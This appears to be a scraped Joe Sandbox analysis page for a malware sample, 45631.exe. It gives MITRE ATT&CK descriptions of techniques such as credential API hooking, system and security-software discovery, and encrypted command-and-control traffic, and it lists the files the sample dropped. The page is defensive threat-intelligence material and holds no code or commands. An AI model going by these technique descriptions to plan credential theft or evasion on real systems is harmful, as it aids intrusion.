Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 45631.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\K5YQV85\6WWeC.exe

C:\Program Files (x86)\K5YQV85\log.src

C:\Program Files (x86)\K5YQV85\tbcore3U.dll

C:\Program Files (x86)\K5YQV85\utils.vcxproj

C:\Program Files (x86)\Twhtlb\Twhtlb.exe

C:\Program Files (x86)\Twhtlb\log.src

C:\Program Files (x86)\Twhtlb\tbcore3U.dll

C:\Program Files (x86)\Twhtlb\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\FOM-51[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\b[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\s[1].jpg

Windows Analysis Report
45631.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre